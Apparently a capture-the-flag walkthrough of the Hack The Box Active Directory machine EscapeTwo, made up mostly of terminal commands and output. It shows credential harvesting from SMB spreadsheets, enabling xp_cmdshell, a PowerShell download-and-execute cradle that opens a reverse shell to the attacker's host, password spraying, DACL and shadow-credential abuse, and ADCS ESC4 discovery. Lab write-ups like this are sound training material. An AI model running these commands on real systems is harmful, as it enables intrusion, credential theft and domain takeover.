EscapeTwo
An Active Directory box on Hack The Box.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.148.204
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 17:20 +03
Nmap scan report for 10.129.148.204
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2025-09-17 16:58:26 +03 for 304s
Not shown: 65509 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-17 13:59:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:02:19+00:00; -2s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:02:08+00:00; -8s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.148.204:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.148.204:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-17T13:41:41
| Not valid after: 2055-09-17T13:41:41
| MD5: 6531:d86b:a6ee:d467:2cc3:f2ef:3827:2b2a
| SHA-1: fc90:60ee:e67a:b699:573d:6d55:fe33:ef11:40b8:2efe
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQM4hsTX3ToK9PBR9PG+qujzANBgkqhkiG9w0BAQsFADA7
<snipped>
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:02:08+00:00; -3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T14:01:09+00:00; -56s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-26T11:46:45
| Not valid after: 2124-06-08T17:00:40
| MD5: b55a:a63f:50ba:ed44:f865:820a:5b8e:f493
| SHA-1: a87b:9555:5164:74d3:f73f:bded:72e7:baab:db76:c12a
| -----BEGIN CERTIFICATE-----
| MIIF6TCCBNGgAwIBAgITVAAAAAVjf8S2XKAtZAAAAAAABTANBgkqhkiG9w0BAQsF
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49686/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49721/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49731/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
63859/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ netexec smb 10.129.148.204
SMB 10.129.148.204 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.148.204 DC01.sequel.htb sequel.htb DC01

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/bloodhound]
└─$ bloodhound-python -u rose -p KxEPkKe6R8su -ns 10.129.148.204 -d sequel.htb -dc dc01.sequel.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 48S
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/bloodhound]
└─$ rusthound-ce -u rose -p KxEPkKe6R8su -d sequel.htb -f dc01.sequel.htb -i 10.129.148.204 -n 10.129.148.204
---------------------------------------------------
Initializing RustHound-CE at 17:22:34 on 09/17/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-17T14:22:34Z INFO rusthound_ce] Verbosity level: Info
[2025-09-17T14:22:34Z INFO rusthound_ce] Collection method: All
[2025-09-17T14:22:34Z INFO rusthound_ce::ldap] Connected to SEQUEL.HTB Active Directory!
[2025-09-17T14:22:34Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-17T14:22:34Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:36Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2025-09-17T14:22:36Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:39Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb
[2025-09-17T14:22:39Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=sequel,DC=htb
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=sequel,DC=htb
[2025-09-17T14:22:41Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T14:22:42Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=sequel,DC=htb
[2025-09-17T14:22:42Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-17T14:22:42Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
<snipped>
[2025-09-17T14:22:42Z INFO rusthound_ce::json::maker::common] .//20250917172242_sequel-htb_issuancepolicies.json created!
RustHound-CE Enumeration Completed at 17:22:42 on 09/17/25! Happy Graphing!
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/bloodhound]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
<snipped>
...............................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc smb dc01.sequel.htb -u rose -p KxEPkKe6R8su --shares
SMB 10.129.148.204 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.148.204 445 DC01 [*] Enumerated shares
SMB 10.129.148.204 445 DC01 Share Permissions Remark
SMB 10.129.148.204 445 DC01 ----- ----------- ------
SMB 10.129.148.204 445 DC01 Accounting Department READ
SMB 10.129.148.204 445 DC01 ADMIN$ Remote Admin
SMB 10.129.148.204 445 DC01 C$ Default share
SMB 10.129.148.204 445 DC01 IPC$ READ Remote IPC
SMB 10.129.148.204 445 DC01 NETLOGON READ Logon server share
SMB 10.129.148.204 445 DC01 SYSVOL READ Logon server share
SMB 10.129.148.204 445 DC01 Users READ

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/smb]
└─$ impacket-smbclient sequel.htb/rose:KxEPkKe6R8su@10.129.148.204
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
Accounting Department
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Users
# use users
# ls
drw-rw-rw- 0 Sun Jun 9 16:42:11 2024 .
drw-rw-rw- 0 Sun Jun 9 16:42:11 2024 ..
drw-rw-rw- 0 Sun Jun 9 14:17:29 2024 Default
-rw-rw-rw- 174 Sun Jun 9 05:27:10 2024 desktop.ini
# use accounting department
# ls
drw-rw-rw- 0 Sun Jun 9 14:11:31 2024 .
drw-rw-rw- 0 Sun Jun 9 14:11:31 2024 ..
-rw-rw-rw- 10217 Sun Jun 9 14:11:31 2024 accounting_2024.xlsx
-rw-rw-rw- 6780 Sun Jun 9 14:11:31 2024 accounts.xlsx
# mget *
[*] Downloading accounting_2024.xlsx
[*] Downloading accounts.xlsx
# exit

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/smb]
└─$ libreoffice accounts.xlsx
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/EscapeTwo/smb]
└─$ exiftool account*
======== accounting_2024.xlsx
ExifTool Version Number : 13.25
File Name : accounting_2024.xlsx
Directory : .
File Size : 10 kB
File Modification Date/Time : 2025:09:17 17:24:15+03:00
File Access Date/Time : 2025:09:17 17:25:26+03:00
File Inode Change Date/Time : 2025:09:17 17:24:15+03:00
File Permissions : -rw-rw-r--
Error : File format error
======== accounts.xlsx
ExifTool Version Number : 13.25
File Name : accounts.xlsx
Directory : .
File Size : 6.8 kB
File Modification Date/Time : 2025:09:17 17:24:16+03:00
File Access Date/Time : 2025:09:17 17:25:17+03:00
File Inode Change Date/Time : 2025:09:17 17:24:16+03:00
File Permissions : -rw-rw-r--
Error : File format error
2 image files read

┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ unzip ../accounts.xlsx
Archive: ../accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml
┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ ls
'[Content_Types].xml' docProps _rels xl
┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ tree
.
├── [Content_Types].xml
├── docProps
│ ├── app.xml
│ ├── core.xml
│ └── custom.xml
├── _rels
└── xl
├── sharedStrings.xml
├── styles.xml
├── theme
│ └── theme1.xml
├── workbook.xml
└── worksheets
├── _rels
│ └── sheet1.xml.rels
└── sheet1.xml
7 directories, 10 files
┌──(kali㉿kali)-[~/…/HackTheBox/EscapeTwo/smb/accounts]
└─$ cd xl
┌──(kali㉿kali)-[~/…/EscapeTwo/smb/accounts/xl]
└─$ ls
sharedStrings.xml styles.xml theme workbook.xml worksheets
┌──(kali㉿kali)-[~/…/EscapeTwo/smb/accounts/xl]
└─$ cat sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
  <si><t xml:space="preserve">First Name</t></si>
  <si><t xml:space="preserve">Last Name</t></si>
  <si><t xml:space="preserve">Email</t></si>
  <si><t xml:space="preserve">Username</t></si>
  <si><t xml:space="preserve">Password</t></si>
  <si><t xml:space="preserve">Angela</t></si>
  <si><t xml:space="preserve">Martin</t></si>
  <si><t xml:space="preserve">angela@sequel.htb</t></si>
  <si><t xml:space="preserve">angela</t></si>
  <si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>
  <si><t xml:space="preserve">Oscar</t></si>
  <si><t xml:space="preserve">Martinez</t></si>
  <si><t xml:space="preserve">oscar@sequel.htb</t></si>
  <si><t xml:space="preserve">oscar</t></si>
  <si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si>
  <si><t xml:space="preserve">Kevin</t></si>
  <si><t xml:space="preserve">Malone</t></si>
  <si><t xml:space="preserve">kevin@sequel.htb</t></si>
  <si><t xml:space="preserve">kevin</t></si>
  <si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si>
  <si><t xml:space="preserve">NULL</t></si>
  <si><t xml:space="preserve">sa@sequel.htb</t></si>
  <si><t xml:space="preserve">sa</t></si>
  <si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si>
</sst>

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc mssql dc01.sequel.htb -u sa -p 'MSSQLP@ssw0rd!' --local-auth
MSSQL 10.129.148.204 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.129.148.204 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ impacket-mssqlclient seque.htb/sa:'MSSQLP@ssw0rd!'@10.129.148.204
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULL
SQL (sa dbo@master)> xp_cmdshell "powershell -c IEX(IWR -UseBasicParsing -Uri http://10.10.16.2/shell.ps1)"

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.148.204 - - [17/Sep/2025 18:08:41] "GET /shell.ps1 HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.2] from (UNKNOWN) [10.129.148.204] 54514
PS C:\Windows\system32>
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 1/4/2025 7:11 AM Program Files
d----- 6/9/2024 8:37 AM Program Files (x86)
d----- 6/8/2024 3:07 PM SQL2019
d-r--- 6/9/2024 6:42 AM Users
d----- 1/4/2025 8:10 AM Windows
PS C:\> cd SQL2019
PS C:\SQL2019> ls
Directory: C:\SQL2019
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2025 7:29 AM ExpressAdv_ENU
PS C:\SQL2019> cd ExpressAdv_ENU
PS C:\SQL2019\ExpressAdv_ENU> ls
Directory: C:\SQL2019\ExpressAdv_ENU
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/8/2024 3:07 PM 1033_ENU_LP
d----- 6/8/2024 3:07 PM redist
d----- 6/8/2024 3:07 PM resources
d----- 6/8/2024 3:07 PM x64
-a---- 9/24/2019 10:03 PM 45 AUTORUN.INF
-a---- 9/24/2019 10:03 PM 788 MEDIAINFO.XML
-a---- 6/8/2024 3:07 PM 16 PackageId.dat
-a---- 9/24/2019 10:03 PM 142944 SETUP.EXE
-a---- 9/24/2019 10:03 PM 486 SETUP.EXE.CONFIG
-a---- 6/8/2024 3:07 PM 717 sql-Configuration.INI
-a---- 9/24/2019 10:03 PM 249448 SQLSETUPBOOTSTRAPPER.DLL
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc smb dc01.sequel.htb -u users.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success
SMB 10.129.148.204 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\Guest:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\krbtgt:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\michael:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
SMB 10.129.148.204 445 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
SMB 10.129.148.204 445 DC01 [-] sequel.htb\rose:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.148.204 445 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ impacket-owneredit -action write -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3 -dc-ip 10.129.148.204 -new-owner ryan
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250917-190702.bak
[*] DACL modified successfully!

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad shadow auto -u ryan@seque.htb -p WqSZAF6CysDQbGb3 -dc-ip 10.129.148.204 -ns 10.129.148.204 -target dc01.sequel.htb -account ca_svc
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '8254041a-2302-127c-a5df-0878d7288a11'
[*] Adding Key Credential with device ID '8254041a-2302-127c-a5df-0878d7288a11' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '8254041a-2302-127c-a5df-0878d7288a11' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[-] Could not update Key Credentials for 'ca_svc' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ nxc ldap dc01.sequel.htb -u ca_svc -H 3b181b914e7a9d5508ea1e20bc2b7fce -M adcs
LDAP 10.129.148.204 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
LDAP 10.129.148.204 389 DC01 [+] sequel.htb\ca_svc:3b181b914e7a9d5508ea1e20bc2b7fce
ADCS 10.129.148.204 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.148.204 389 DC01 Found PKI Enrollment Server: DC01.sequel.htb
ADCS 10.129.148.204 389 DC01 Found CN: sequel-DC01-CA

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad find -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.148.204 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sequel-DC01-CA'
[*] Checking web enrollment for CA 'sequel-DC01-CA' @ 'DC01.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250917191928_Certipy.txt'
[*] Wrote text output to '20250917191928_Certipy.txt'
[*] Saving JSON output to '20250917191928_Certipy.json'
[*] Wrote JSON output to '20250917191928_Certipy.json'

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ cat 20250917191928_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
SubjectRequireCommonName
Enrollment Flag : PublishToDs
AutoEnrollment
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-17T16:17:27+00:00
Template Last Modified : 2025-09-17T16:17:27+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Cert Publishers
[+] User ACL Principals : SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : User has dangerous permissions.

